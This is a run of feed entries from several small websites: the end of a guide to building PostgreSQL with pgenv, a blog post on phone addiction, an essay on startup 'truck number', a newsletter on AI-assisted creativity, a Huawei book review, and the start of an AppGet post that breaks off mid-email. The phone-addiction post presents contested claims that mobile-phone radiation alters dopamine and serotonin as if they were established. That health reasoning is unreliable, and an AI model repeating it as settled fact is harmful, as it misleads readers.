      "LDFLAGS=-L$HOMEBREW_PREFIX/opt/icu4c/lib -L$HOMEBREW_PREFIX/opt/openssl/lib -L$HOMEBREW_PREFIX/opt/readline/lib"
    )
    
    # Path to the log file (must match your XDG cache path).
    export PGENV_LOG="$HOME/.cache/pgenv/pgsql/data/server.log"
    
    # Script to execute when initdb finishes (and the server has not started yet).
    export PGENV_SCRIPT_FIRSTSTART="$HOME/.config/pgenv/initialize"
    
    # Ensures configuration is preserved.
    export PGENV_WRITE_CONFIGURATION_FILE_AUTOMATICALLY=no

The PGENV_CONFIGURE_OPTIONS variable is the most important and must not be preceded by an export statement or the options won’t be applied. Here’s the breakdown from top to bottom (a quick way to verify these flags after a build follows the list):

    • --enable-thread-safety: Ensures client libraries can make thread-safe concurrent connections.

    • --with-bonjour: Handy for macOS environments by allowing PostgreSQL servers to advertise their presence on the network, making it easier for clients to discover and connect to available PostgreSQL instances.

    • --with-llvm: Enables support for LLVM-based Just-In-Time (JIT) compilation which enhances query performance by allowing PostgreSQL to compile frequently executed code into machine-specific optimized instructions at runtime.

    • --with-openssl: Enables secure connections using OpenSSL.

• --with-uuid=e2fs: Enables UUID support for primary keys and allows you to run migrations that enable UUIDs. For example: enable_extension "uuid-ossp".

    • PKG_CONFIG_PATH: Ensures you have unicode support as installed and managed by Homebrew (see icu4c for details). 💡 This means you’ll need to update the version from time to time when a new version of icu4c drops.

    • LLVM_CONFIG and CLANG: Ensures LLVM is configured as installed and managed by Homebrew.

    • CPPFLAGS, CFLAGS, LDFLAGS: All of these build flags are necessary to build PostgreSQL with unicode, OpenSSL, and readline support.
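Once a version is built, you can confirm these options actually took effect using pg_config, which ships with every PostgreSQL installation:

# Prints the configure flags this PostgreSQL build was compiled with.
pg_config --configure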

    The PGENV_LOG variable must point to your XDG cache location. Otherwise, you’ll not be able to start PostgreSQL.

    The PGENV_SCRIPT_FIRSTSTART variable allows you to run custom code once a specific PostgreSQL version has been installed and used for the first time (i.e. pgenv use <version>). This is handy for automating additional setup after the database has been initialized and the server started. For example, here’s what I’m using:

    #! /usr/bin/env bash
    
    set -o nounset
    set -o errexit
    set -o pipefail
    IFS=$'\n\t'
    
    psql --username postgres \
         --command "CREATE ROLE $USER WITH SUPERUSER CREATEDB CREATEROLE LOGIN PASSWORD '';"
    psql --username postgres --command "CREATE DATABASE $USER;"
    
    (
      cd "$HOME/.cache/pgenv/pgsql/data"
    
      if [[ ! -e "server.key" && ! -e "server.crt" ]]; then
        openssl req -new \
                    -x509 \
                    -days 365 \
                    -nodes \
                    -text \
                    -out server.crt \
                    -keyout server.key \
                    -subj "/CN=postgres"
    
        chmod 0600 server.key
      fi
    )
    
    psql -c "ALTER SYSTEM SET ssl = 'on';"
    psql -c "ALTER SYSTEM SET ssl_cert_file = 'server.crt';"
    psql -c "ALTER SYSTEM SET ssl_key_file = 'server.key';"
    psql -c "ALTER SYSTEM SET ssl_min_protocol_version = 'TLSv1.3';"
    
    pgenv restart

    The above performs the following steps:

    1. Configures Bash for strict use.

    2. Ensures the current user (i.e. $USER) is created with the ability to manage databases.

    3. Creates a local SSL key and certificate but only if they don’t exist.

    4. Enables SSL support.

    5. Restarts the server to pick up the changes.

    You can customize further as desired but all of this will ensure you can immediately build, install, and use a PostgreSQL version.

Lastly, the PGENV_WRITE_CONFIGURATION_FILE_AUTOMATICALLY variable is critical to prevent your configuration from being overwritten each time you remove or install the same and/or a different version of PostgreSQL.

With this default configuration in place, you now have a foundation for installing multiple versions because they’ll inherit from this default. To provide specialized configurations for different versions, you can use pgenv config <command> <version>. For example, when pgenv config init was used above, that created the default configuration, but if you want to start configuring a specific version, you’d use: pgenv config init 16.0.

    Workflow

    With all of the above in place, installing and using a PostgreSQL version is as simple as:

    pgenv build 17.0
    pgenv use 17.0
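Beyond build and use, a few other subcommands cover day-to-day management (a sketch based on pgenv’s documented interface; run pgenv help for the authoritative list):

# List every version pgenv has built; the active one is marked.
pgenv versions

# Show the currently active version.
pgenv version

# Stop, start, or restart the active server.
pgenv stop
pgenv start
pgenv restart

# Switch to another installed version (pgenv stops the current server first).
pgenv use 16.0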

    You can also check that SSL is enabled and your extensions are available:

    # Check if SSL is enabled.
    psql -c "SHOW ssl;"
    
    # Check available extensions.
    psql -c "SELECT * FROM pg_available_extensions;"

    Resources

    If you’d like to see how I manage and configure all of this, check out these projects:

    • Dotfiles: Used to maintain my Bash aliases, functions, configuration, and more.

    • macOS Configuration: Used to install and manage all software. Perfect for managing existing hardware or automating the setup of a brand new machine with a fully functional working development environment.

    Troubleshooting

    • If you get install errors due to an updated or outdated icu4c, make sure you update your PKG_CONFIG_PATH to point to the latest icu4c version.

• If you have trouble installing the pg gem due to reinstalling PostgreSQL, installing a different version, etc., then uninstall (i.e. gem uninstall pg) and reinstall (i.e. gem install pg) to pick up the latest changes.

    Recap

You’ve learned how to install, configure, and use pgenv for managing multiple PostgreSQL versions. You’ve also learned how to customize pgenv so you can immediately create and use databases, something pgenv’s own documentation doesn’t cover. This should make your workflow easier while also allowing you to migrate more easily to newer versions of PostgreSQL. Enjoy!

    ]]>
    https://alchemists.io/articles/postgres_version_managers hacker-news-small-sites-43219662 Sat, 01 Mar 2025 14:44:40 GMT
    <![CDATA[Hooked on Your Phone? The Science Behind Addiction and Anxiety]]> thread link) | @claudiasin
    March 1, 2025 | https://www.sciencex.cc/blog-posts/why-do-we-feel-addicted-or-anxious-with-our-mobile-phones | archive.org

    Why can’t we put our phones down? And why does being without them make us so uneasy? Discover how neuroscience uncovers the surprising roles of neurotransmitters, electromagnetic radiation (EMR), and pulsed electromagnetic radiation (PEMR) in shaping our emotions and habits. 📡 Dive into the fascinating science behind your phone addiction!

    Claudia HC Sin

    Founder & Host at ScienceX, Business owner of ChatCampaign Research Lab

    The Neuroscience of Mobile Phone Addiction

    1. Dopamine and Reward Pathways

    When you check your phone for notifications, social media updates, or messages, your brain releases dopamine, the neurotransmitter responsible for pleasure and reward. This creates a "dopamine loop," where every notification reinforces the habit of checking your phone. Over time, this can lead to compulsive behavior, similar to other forms of addiction (Check: 《Irresistible: The Rise of Addictive Technology and the Business of Keeping Us Hooked》). 📲✨

    However, electromagnetic radiation (EMR) from mobile phones may also play a role. EMR is just radiation in common terms—your phone uses electromagnetic waves to communicate with cell towers or repeaters in buildings far away, and that's radiation already.

Full spectrum of electromagnetic waves

Mobile phones rely on electromagnetic waves to function, and with the evolution of technology, the frequency range has expanded. For example:

    • 2G-4G networks primarily use radio frequencies between 700 MHz and 2.6 GHz.
    • 5G networks touch on the microwave frequency spectrum, operating in both mid-band frequencies (1 GHz to 6 GHz) and high-band millimeter waves (24 GHz to 40 GHz).

    Research indicates that long-term exposure to EMR, particularly radiofrequency electromagnetic fields (RF-EMFs), can disrupt dopamine metabolism in the brain. A study published in Frontiers in Public Health found that prolonged RF-EMF exposure reduced dopamine levels in the hippocampus, a brain region critical for learning and memory (Hu et al., 2021). Lower dopamine levels in this region may contribute to cognitive impairments and emotional dysregulation. 🧠

Several studies reported the effects of EMR on DA (dopamine). For example, adult rats undergoing daily EMR exposure for 1 h, with an EMR frequency of 1,800 MHz, a specific absorption rate (SAR) value of 0.843 W/kg, power density of 0.02 mW/cm², induced a significant decrease in DA in the hippocampus after 2 months of exposure and 1 month after cessation of exposure. This study indicated that EMR exposure may reduce DA production in the hippocampus, affect rat arousal, and contribute to decreased learning and memory ability after exposure to EMR.

    2. Anxiety and Serotonin Dysregulation

    Beyond addiction, mobile phones can also trigger anxiety. Neuroscience suggests that serotonin (5-HT), the neurotransmitter associated with mood regulation, may be affected by mobile phone use.

• Research on pulsed electromagnetic radiation (PEMR) highlights that exposure can alter serotonin turnover (how quickly serotonin is produced, released, used, and then broken down) in the brain. Increased serotonin turnover rates have been linked to mood swings, anxiety, and disrupted sleep patterns (Hu et al., 2021).
      • If serotonin turnover is too fast or too slow, it can lead to imbalances in serotonin levels. These imbalances affect mood regulation, causing unpredictable mood swings (e.g., feeling happy one moment and irritable the next).
      • Low serotonin levels or irregular turnover can heighten the brain's response to stress, leading to anxiety. Serotonin plays a calming role, so disruptions in its turnover can make it harder to feel relaxed and manage stress.
      • Serotonin is a precursor to melatonin, a hormone that regulates sleep.
    • Another study on rats demonstrated that PEMR exposure caused significant changes in serotonin levels, which were associated with anxiety-like behaviors (ResearchGate study).

    3. Electromagnetic Fields and Cognitive Stress

    Mobile phones emit electromagnetic fields (EMFs), which can affect brain function. Studies show that EMF exposure may lead to oxidative stress, calcium ion dysregulation, and neurotransmitter imbalances:

    • Oxidative Stress: EMFs generate reactive oxygen species (ROS), which damage neurons and disrupt neurotransmitter metabolism (Hu et al., 2021).
    • Calcium Dysregulation: EMFs alter the activity of voltage-gated calcium channels (VGCCs), increasing intracellular calcium levels. This disrupts synaptic transmission and can contribute to anxiety (Pall, 2013).
    • Cognitive Changes: EMF exposure has been linked to impairments in learning, memory, and emotional regulation. Researchers found that long-term exposure to mobile phone radiation affected glutamate (an excitatory neurotransmitter) and GABA (an inhibitory neurotransmitter), disrupting the brain's excitatory-inhibitory balance (Hu et al., 2021).

    The Anxiety-Addiction Cycle

    The combination of dopamine-driven reward mechanisms and EMF-induced neurotransmitter imbalances creates a vicious cycle:

    1. Compulsion: Dopamine release from notifications reinforces frequent phone use.
    2. Anxiety: Being separated from your phone disrupts serotonin balance, causing stress.
    3. Cognitive Overload: Continuous EMF exposure disrupts neurotransmitter balance, impairing memory and decision-making.

    This cycle explains why we feel both addicted to and anxious without our phones. 📉

    Practical Tips to Break the Cycle

    To reduce the impact of mobile phone addiction and EMF exposure:

    • Set Boundaries: Limit screen time and designate "phone-free" periods during the day.
    • Sleep Hygiene: Avoid using your phone before bed to prevent EMF-induced sleep disturbances.
    • EMF Mitigation: Use headphones or speakerphone to minimize direct exposure to your head.

    Conclusion

    Our relationship with mobile phones is deeply intertwined with neuroscience. The interplay between dopamine, serotonin, and EMF exposure sheds light on why we feel addicted and anxious. While mobile phones are indispensable in modern life, understanding their impact on the brain can help us use them more mindfully. 🌐

    References

    1. Hu, C., Zuo, H., & Li, Y. (2021). Effects of Radiofrequency Electromagnetic Radiation on Neurotransmitters in the Brain. Frontiers in Public Health. Read here
    2. Aboul Ezz, H.S., et al. (2013). The effect of pulsed electromagnetic radiation from mobile phones on the levels of monoamine neurotransmitters in four different areas of the rat brain. ResearchGate. Read here
    3. Pall, M. L. (2013). Electromagnetic fields act via activation of voltage-gated calcium channels to produce beneficial or adverse effects. Journal of Cellular and Molecular Medicine, 17(8), 958–965. DOI: 10.1111/jcmm.12088

    All opinions and advice in this blog post are solely those of the author and do not reflect the views of the platform or any collaboration partners.


    ]]>
    https://www.sciencex.cc/blog-posts/why-do-we-feel-addicted-or-anxious-with-our-mobile-phones hacker-news-small-sites-43219339 Sat, 01 Mar 2025 14:05:27 GMT
    <![CDATA[Why your startup's Truck Number might be lower than you think]]> thread link) | @gkedzierski
    March 1, 2025 | https://gregkedzierski.com/essays/truck-number/ | archive.org

    • startups
    • management

    In software engineering, the Truck Number (also known as the Bus Factor) measures how many key people can leave before a project is in serious trouble. A Truck Number of 1 means a single person holds critical knowledge - if they disappear, everything grinds to a halt. In startups, where teams are small and highly specialized, this risk is even greater. Founders, lead engineers, and early employees often accumulate institutional knowledge that isn’t written down, making them single points of failure.

Startups, by their nature, push for speed over redundancy. A lean team is efficient but fragile. If only one developer understands the core architecture, or a single data scientist fine-tunes the AI model, losing them could be catastrophic. Documentation and cross-training take time, and when shipping features is the priority, those practices are often overlooked. But when the inevitable happens - whether through burnout, new job offers, or personal emergencies - the team scrambles to recover lost expertise.

    AI has added a new dimension to the Truck Number problem. Many machine learning models are developed by a handful of experts who understand not just the code but the reasoning behind the training data, hyperparameters, and trade-offs. Unlike traditional software, AI models are often difficult to interpret, making it even harder for a new engineer to step in. A startup’s AI pipeline might rely on a single person who built it, meaning the Truck Number is effectively 1. Worse, if the model is undocumented or trained on proprietary data, even a new hire may struggle to replicate previous work.

    Ironically, AI itself might help mitigate this issue. Code-generation tools like GitHub Copilot and AI-assisted documentation tools can reduce dependency on any one individual by making code more accessible. Startups can also use AI to automate repetitive tasks, freeing up senior engineers to focus on knowledge-sharing. However, these tools are no replacement for a strong engineering culture that values redundancy, shared ownership, and clear documentation.

    Ultimately, a high Truck Number should be a deliberate goal, not a happy accident. Regular knowledge-sharing sessions, better documentation practices, and pairing junior developers with experienced team members all contribute to long-term sustainability. In startups and AI-driven teams, where innovation moves fast and talent is scarce, the ability to continue without any single person is a competitive advantage. If your Truck Number is too low, it's not just a risk - it’s a ticking time bomb.


    PS. If you liked this article, please share to spread the word.

    Looking for a handy server monitoring tool?

    Check out StackScout, a project I've been working on for the past few years. It's a user-friendly web app that keeps an eye on your servers across different clouds and data centers. With StackScout, you can set custom alerts, access informative reports, and use some neat analytics tools. Feel free to give it a spin and let me know what you think!

    Learn more about StackScout

    StackScout server monitoring tool screenshot


    ]]>
    https://gregkedzierski.com/essays/truck-number/ hacker-news-small-sites-43219315 Sat, 01 Mar 2025 14:02:27 GMT
    <![CDATA[AI-assisted creativity and the race to claim the future]]> thread link) | @Kye
    March 1, 2025 | https://kyefox.com/ai-assisted-creativity/ | archive.org

    Newsletter

    In this issue we grab the future by its shiny metal cranium and hold on for dear life while we look for the control panel.

    Generative AI, when used effectively, isn't about replacing creativity. Instead, it can help you identify patterns and create frameworks based on your existing work. But the conversation around AI is often dominated by powerful voices that risk steering us toward a future we don't want. That's why it's crucial for creatives to take control of these tools.

    • For Writers: LLMs can help identify overused phrases, pacing issues, or inconsistencies in character voice – creating frameworks for self-editing checklists.
    • For Musicians: Musicians could use AI to analyze song structures, chord progressions, or mixing habits, creating guides for experimenting with new arrangements or identifying sonic blind spots. I asked "what makes a pirate song anyway?" and got a quick useful answer that all my searching on traditional search engines failed to deliver.
    • For Visual Artists/Photographers: Visual artists and photographers could use AI to analyze their compositions, color palettes, or recurring motifs, generating style guides to push their boundaries or refine their signature look.

    I’m no critic of writing, art, music, or photography—that’s an entire skill set I never took the time to develop. Yet by feeding AI samples of my own work, I can generate style guides that highlight my quirks and recurring themes. I see the techniques I use (sometimes unconsciously) laid out in black and white. That’s a huge boost to my self-awareness and lets me focus my practice where it matters most. It’s like having an ultra-patient, high-level creative consultant on call. For example: it pulled some common threads out of my fiction writing like glowy mystery ruins and biomechanical structures. Think leviathans like Moya on the Farscape series. Not so much Borg Cubes. I favor design and elegance over structure-spanning redundancy.

    Of course, you can’t rely on AI to be your creative engine. That spark still has to come from you. But if you view AI as a toolkit—one that shows you patterns in your existing work—you stay firmly in the driver’s seat. It’s no replacement for a sapient critic’s discerning view, but for most of us, that's much of the value.

    AI offers a neutral space to get that initial, unfiltered assessment, which can then inform more nuanced discussions with human peers. It’s not about replacing traditional feedback, but supplementing it, especially when you need consistent input or a perspective given without fear of hurting your feelings. That hesitance toward bluntness is a good and normal way to be in most cases, but devastating for creative growth when it's all you have. An LLM chatbot will be as honest or flattering as you tell it to be.

    Generative AI is also a fantastic research tool and a gateway for quick reflection. It can help you draft and edit, rapidly iterate through possibilities, or quickly get the gist of background material or early-stage ideas. See my Perplexity.ai post for a concrete example.

    We need you because the conversation around AI is often dominated by four major voices:

• The Bosses, who blurt out sweeping mandates and hang the threat of replacement by AI over employees' heads. Some try to gloss over the potential downsides by mentioning the need for basic income and housing guarantees. And please don't look into their operations or regulate them, you'll get in the way of The Future! Bosses gonna boss, and have all the way up to and past the introduction of the power loom. Be part of the looming power that holds them accountable.
    • The Swindlers, who promise you’ll become the next boss. Every developer who knows how to tie together a chat app with cloud AI APIs is making one with varying quality, and not all of them are on the level. This would make an excellent pathway for a bad actor to exfiltrate all kinds of data. Stick to reputable people.
• The Incredulous, content to watch with a skeptical side-eye. It feels safe over there on the sidelines, but this stuff is here and it's only going to find its way into more parts of our lives. Be part of the countervailing force that keeps it in check.
    • The Chorus, taking potshots from the sidelines at anyone who tries to engage with the topic. I get it, a lot of the people pushing this stuff early on were assholes, and opinions were set hard because of it. If this feels like it's aimed at you, it's time to take another look.

    All four, in their own ways, risk steering us toward a brain drain we might not recover from—unless we figure out how to take control of these tools.

Companies have recently taken to discarding valuable domain expertise on the assumption that AI can entirely replace the nuanced insights of human experts. In reality, while AI is a powerful tool, it cannot replicate the deep, context-driven understanding that comes from years of experience. Forward-thinking organizations are, hopefully, capturing and retaining this expertise instead, ensuring that the knowledge of seasoned professionals remains in-house rather than lost to retirement or moves to new careers.

    We’ve already witnessed this dynamic in hiring: companies post job ads with sky-high expectations yet refuse to invest in training, leaving them scrambling for talent as experienced workers retire or change careers and the pipeline of seasoned professionals dwindles. AI can help train new people, but it can't replace them, and it can't stand in for a good hiring process. Someone has to come along with the fresh ideas and beginner mind that allows people, companies, organizations, and civilization to thrive decade after decade.

That’s why I’m choosing a more intentional route. AI isn’t here to do the writing for me or pump out my next masterpiece—it’s just an on-call creative assistant. Sure, AI isn't as kind and supportive as a good friend, but it also won’t sidestep honest critique for fear of hurting your feelings. What it lacks in emotional intelligence it makes up for in availability. For example: I completed the drafting process for this article, exploring ideas and focus points and structures, in a day when it normally takes a week or longer. I still handed it to a real human comrade for a beta read once it was to that point.

    Think of it as a sounding board, not just for yourself, but potentially for creative partnerships. Imagine quickly testing out different approaches with a collaborator, using AI to rapidly visualize or prototype ideas before investing heavily in one direction.

    Let's take the future of creativity back into our own hands. This isn't about being swept away by a technological tide; it's about creatives actively steering the ship. Join me in figuring this out – sharing our experiments, insights, and strategies as we navigate this wild ride together.

    Some cloud-based tools to consider:

    • I use ChatGPT, going free when I just need to poke at it sometimes, paying $20 for a month when it's time to power through a project. The few messages a day you get on the free plan go a long way once you get a knack for prompting.
    • T3 chat, developed by a YouTube-famous developer who goes by Theo, has an $8/month paid plan with access to most of the best models and file uploads. The best balance of features and price for most people.
    • Google's Gemini has generous free limits and produces consistently high quality responses. They also offer NotebookLM which is more research-focused.

    Resources

    • 3Blue1Brown's series on neural networks and vcubingx's series focusing on LLMs will get you up to speed. Not strictly necessary to understand, but no artist has been made worse off by understanding their tools in depth.
    • OpenAI released a guide to prompting the new class of models collectively known as "reasoning." Reasoning models, while still LLMs with all the problems they have, are much better.
    • The generative AI page on Wikipedia
    • InvokeAI and LM Studio are two popular ways to run these tools locally. InvokeAI is focused on image generation models. LM Studio has file support, so you can do like I suggested further up and have the models it supports analyze your work. There's also ComfyUI if you like fine-grain control over your image generation.
    • LM Studio does not support commercial use in its terms, but it's the easiest way to get used to this stuff and try out different sizes (like 7B and 1B) and kinds of model like instruct, coding, and math. You can check the LocalLLaMA subreddit for discussion of the latest tools and resources, including finding something that suits your needs best. There's also the old standard AlternativeTo.
    • Hugging Face and CivitAI are the places to go to find models for use cases from general to bizarrely specific.
    • If you don't have a powerful GPU at home, store bought is fine. Running models on cloud hosts is outside my experience, so you'll have to research this one yourself. This goes with the next point: running a model on a dedicated machine learning system is more efficient than running it on your gaming GPU and likely uses less electricity. You can also evaluate their green energy claims.
    • On the stuff I haven't addressed here but will in more detail in future writing: While I have a well-founded and well-tested belief that the training for these models isn't stealing in a legal sense, and that properly used can be less damaging to the environment than not using them, I do understand some people aren't convinced. There are efforts underway to create models using public domain and freely licensed stuff and tooling to enable it at human-scale costs, plus the distillation (using a big general model to train a small task-focused model), RLHF, and synthetic data (curated model outputs put back into the model to adjust statistical weights) methods already used to improve and focus the major models. These efforts make training more accessible, and make it more viable to run local models using electricity generation sources you can account for, and it only gets better from here.

    Prompting tip

    The more you can see the inputs and outputs as blobs of "stuff," the better. If LLMs think, it's not in any way we yet understand. They're probability engines that transform data into different data using weighted probabilities.

Imagine you're someone with a task for an ancient time-sharing machine. You have something you need the machine to produce based on your inputs, and it's very expensive in value terms to run your task instead of someone else's. "Crap in, crap out" applies here, and the training data behind this machine means there's a lot of "in" you have to account for that isn't your own.

    Assumptions and biases are encoded in the model. You can "invoke" other biases and assumptions with a better-specified input. The less you give it, the more it will tend to follow pathways with the highest weights, and that's not going to be the novel or obscure and interesting stuff you can pluck out with the right words.

    Bad: "Write a science fiction story."

    Better: "List all the major subgenres of science fiction. Write a story in [subgenre]."

    Best:

    • "List all the major subgenres of [major genre 1] and [major genre 2]."
    • "List major tropes of [list of chosen subgenres]."
    • "Outline a long short story merging [list of aspects of subgenre one, list of aspects of subgenre two, ...]. First person perspective. Absolutely no robots. Cyborgs are fine. Emphasize [list of tropes]. Deemphasize [list of other tropes]. Throw in some dinosaurs. Make them accurate, refer to the uploaded PDF on accurate dinosaur depictions, but also cool."

    Also: collect studies and references relevant to your work and interests. Save Wikipedia pages as PDF. These come in handy.

    • "Now give me a draft written from the perspective of the original Sherlock Holmes but he's just landed in the middle of this story and has no idea what's going on."

    That's where you find the gems. I had Star Trek's take on Professor Moriarty opine on digital clones once using the same series' own take on the subject to focus it.

    ]]>
    https://kyefox.com/ai-assisted-creativity/ hacker-news-small-sites-43218960 Sat, 01 Mar 2025 13:18:59 GMT
    <![CDATA[Book Review: House of Huawei]]> thread link) | @minhduong243
    March 1, 2025 | https://onepercentamonth.com/2025/02/27/book-review-house-of-huawei/ | archive.org

House of Huawei, written by Eva Dou, chronicles Huawei’s foundation and development over the years. This is a company at the forefront of technology and one of the largest 5G equipment suppliers, if not the largest, in the world. However, Huawei is marred by controversies. Chinese laws enable the Chinese government to demand total collaboration, in the name of national security, from any company operating in the country. Because Huawei provides telecommunications equipment, other nations, especially those in the West, are concerned that the company is a conduit for Beijing.

This concern caused Huawei to lose lucrative contracts, face intense scrutiny around the world and suffer commercial bans. The company tried its best to assuage other governments, but to no avail. This failure stems from the fact that Huawei could not show any definitive proof that it could say no to Beijing whenever there was a request for collaboration. Furthermore, Huawei also got into trouble for its business deals in the Middle East, especially with Iran, when sanctions were in effect. For good measure, Huawei was sued by multiple companies for alleged intellectual property infringement.

    Huawei was founded by Ren Zhengfei, who was born in Guizhou, China, in 1944. Ren Zhengfei’s father, Ren Moxun, owned a bookstore selling books that were edgy and controversial at the time. In his day job, Ren Moxun worked for the Nationalists, who ruled China at the time and were in a civil war against the Communist Party led by Mao Zedong. Soon, the Japanese retreated from China and the Communists emerged victorious. Because of his work for the Nationalists, Ren Zhengfei’s father was imprisoned for a few years.

The younger Ren went to college and, thanks to the luck of his birth year, managed to complete an education in heating, gas supply and ventilation engineering, right before Mao Zedong forced every youth to labor in the countryside. Ren Zhengfei’s brother did not have such luck. I wonder what Ren Zhengfei’s life would have been like had he not finished his education.

Zhengfei joined the military right after college, served multiple roles, volunteered for a difficult project between China and France, and learned about electronics. His fortune changed for the better when Mao died and Deng Xiaoping took over. Deng Xiaoping valued scientific research and Ren Zhengfei was soon recognized as one of the top scientists in the country. The family soon moved to Shenzhen, where Ren caught a lucky break. The city allowed the establishment of private technology companies as a pilot program in 1987. Ren, along with his five original partners, soon created Huawei. The rest is history.

Ren became an entrepreneur at 44 after having 2-3 kids. He is infamous for an insane work ethic. His wife accused him of putting work above his family. He had multiple health issues due to long working hours. Even when it was not safe in countries like Iraq during the attack by the US, Ren Zhengfei and his team still put in the effort. In addition, Zhengfei had an amazing vision and business acumen. He set up a chip division in secret and kept it away from the spotlight for years. He also pivoted the company to consumer electronics and catapulted Huawei to among the top brands. He chose to prioritize 3G over 2G when 3G was just a novelty. Controversial as it may be, Huawei definitely put in the work to earn its success.

I found Eva Dou’s work incredibly well researched. The book is quite long, but it’s intriguing and easy enough to follow. Really recommend it.

    “Ren now exhorted his sales team to develop a “wolf culture.” “Wolves are really powerful,” Ren told his staff. “They have a keen sense of smell, they are very aggressive, and they don’t attack alone but in packs. As soon as one falls, another steps into the breach. They don’t fear sacrifice.” To win orders, they made bold promises. In a memoir, one former Huawei salesman wrote that his manager had instructed him to tell customers a switch would be ready soon when they both knew it would be months. “Do you think it’s better for the customer to doubt the company or to doubt the ability of a single engineer?” his boss had reasoned. Huawei would build a reputation for courting its customers relentlessly, loitering at hotels or airports to catch traveling officials, even waiting outside their homes. In 1995, China officially switched from a six-day workweek to a five-day one, but Huawei’s staff continued to work around the clock.”

    “In any case, Huawei had a reputation for generosity and hospitality within the industry. It paid for government officials and telecom executives to travel the world for conferences and training sessions. When they visited Huawei’s headquarters, they were greeted with lavish feasts. Ren told his sales managers to continue sending birthday cakes to retired telecom experts who had helped Huawei.

    After he left government office, Li Zibin, former mayor of Shenzhen, was visiting the US in 2007 when there was a knock on his hotel door. He opened it to find Ren standing there, inviting him to dinner. Li was stunned. He wrote in his memoir that Ren told him, “That’s just me, Ren Zhengfei. When you were in office for eleven years, our company didn’t invite you to dinner once. But Huawei’s people know to be grateful. You are our benefactor, and now that you are retired, I’m inviting you to dinner.”

    “Since 2007, Huawei had sold not only networking gear itself but also managed services, or outsourced tech support, to operators around the world. This meant that Huawei’s engineers were contractually obligated to be available if a network operator was experiencing problems. With the Arab Spring turning violent, Ren set off across the Middle East to steel his staff’s nerves.

    During his visits to Iraq, Afghanistan, Libya, and Mali, Ren told Huawei employees that while he sympathized with family members’ concerns over their safety, they couldn’t leave their posts without properly handing off their work. “You can’t flee unconditionally,” he said. “Our professional ethos is to maintain the stability of the network.” He reminded them that theirs was a special vocation. “Tofu shops, fried dough stands, and the like can be shut down at any time, but we cannot.” Ren advised his staff that they should “never” interfere in the politics of any country. “If we give up the network’s stability, then even more people will be sacrificed.”

    Huawei helped the Chinese embassy in Turkey facilitate the evacuation of Chinese nationals from Libya, but some of Huawei’s own engineers stayed behind. ”

    “As Huawei’s smartphone business boomed, it began to draw attention to an obscure corner of the company’s business empire. Gadget reviewers began noticing, with intrigue, that some of Huawei’s phones ran on processors designed by Huawei’s in-house HiSilicon label. These chips were surprisingly good for a brand that Huawei did little to promote. The ability of a telecom company to design its own chips reflected an advanced technical level, with few smartphone makers aside from Apple and Samsung able to do so.

    In 2014, reviewers reported that the HiSilicon processor in Huawei’s Honor 6 smartphone was outperforming even the iPhone in certain benchmarks, though it had marked problems in areas like power consumption. “This is a very interesting result,” one reviewer remarked. Ren was wary of HiSilicon getting too much attention. It risked disrupting Huawei’s relationships with third-party chip suppliers like Qualcomm; the companies might start to see Huawei as a rival instead of a partner. HiSilicon was also still a major supplier for the surveillance-camera industry, something Huawei didn’t tend to talk too much about.

    A reporter at China’s national broadcaster, CCTV, once told Ren it was a pity that more people didn’t need to know “about HiSilicon. “Why does the outside world need to know?” Ren replied. “The outside world doesn’t need to know this.”

    “Long before anyone had heard of Ren Zhengfei or Huawei, Wan Runnan had been China’s star entrepreneur in the 1980s, with his company, the Stone Group, touted as “China’s IBM.” Wan had believed that economic change could lead to political change. He had thrown his support behind the pro-democracy protesters in 1989. As a result, he had to flee to France, with an arrest warrant hanging over his head. He was never able to return home.

    Now, decades later and in failing health in Paris, Wan recalled something that had happened one day in the late 1980s, when he was still living in Beijing. Local officials had invited him to dinner. This was unusual. He was usually the one to invite officials to dine, so as to curry favor with the show of hospitality. Over the meal, the officials told Wan that the Ministry of State Security was going to send agents to work undercover at his company in positions dealing with international relations. The officials cast the move to embed these minders as an act of protection for Wan and the company’s other executives, a security measure that would keep them from stumbling into unseen risks in their dealings with foreigners. “You have a lot of international business, which raises security issues for you. There are situations that you don’t understand,” Wan recalled the officials telling him. “They said, ‘We are sending some people over. You can just treat them like regular employees.’ ”

    “This parallel to China’s governance system offers a lens through which an answer to the question of who controls Huawei can finally be hazarded. Here is what we know about China’s government: the collective governance model obscures who, exactly, is making decisions, and this is by design. Many times, it is the core leader making the decisions, due to his centralized power, but esteemed elders often wield considerable influence in the wings. It can even be possible for them to override the nominal leader on decisions. The party’s internal disciplinary mechanism—present for both the government and for Huawei—serves as a powerful stick to keep individual officials in line, as it allows the party to oust those who are ideologically out of step.

Huawei’s goal, like the party’s, is to ensure its own long-term survival. Achieving this goal requires winning enough buy-in from its workers. But maximizing shareholder value—or individuals’ well-being—is not the end in and of itself. Such a system has strengths and weaknesses. A strength is its ability to accomplish titanic tasks at almost impossible speeds by getting everyone to pull in unison. A weakness is that such a system is often strong but brittle, and its success can come at crushing costs for the individuals involved.

    Huawei is a company made in the image of its nation, in all its fearsomeness and flaws, in all its courage and poetry.

    ]]>
    https://onepercentamonth.com/2025/02/27/book-review-house-of-huawei/ hacker-news-small-sites-43218911 Sat, 01 Mar 2025 13:12:16 GMT
    <![CDATA[The Day AppGet Died (2020)]]> thread link) | @username923409
    March 1, 2025 | https://keivan.io/the-day-appget-died/ | archive.org

    The Day AppGet Died.

    Microsoft released WinGet (not to be confused with AppGet) earlier this week as part of their Build 2020 announcements. For the past few days, I’ve been collecting my thoughts, figuring out what actually happened over the past 12 months.

    TLDR; I’m no longer going to be developing AppGet. The client and backend services will go into maintenance mode immediately until August 1st, 2020, at which point they’ll be shut down permanently.

    If you are still interested, here is how AppGet died.

    A year ago (July 3rd, 2019) I got this email from Andrew, a high-level manager at Microsoft,

    Keivan,

    I run the Windows App Model engineering team and in particular the app deployment team. Just wanted to drop you a quick note to thank you for building appget — it’s a great addition to the Windows ecosystem and makes Windows developers life so much easier. We will likely be up in Vancouver in the coming weeks for meetings with other companies but if you had time we’d love to meet up with you and your team to get feedback on how we can make your life easier building appget.

    Naturally, I was excited; my hobby project being noticed by Microsoft was a big deal. I replied, and two months and a few emails later, we finally had a meeting planned on August 20th at Microsoft Vancouver. The meeting was between me, Andrew and another engineering manager in the same product group. I had a great time; we talked about the ideas behind AppGet, what I thought was broken about the current package manager systems in Windows and what I had planned for AppGet’s future. We went out for lunch and talked a bit more about AppGet, Windows Phone, and a few other things, but the outcome of the meeting as far as I understood it was, what can Microsoft do to help? I mentioned some Azure credit would be nice, getting some doc on how the new MSIX packages work and if they could fix a few issues I had with some of their download links.

    Fast forward a week (to August 28th), and I got this email from Andrew,

    Keivan,

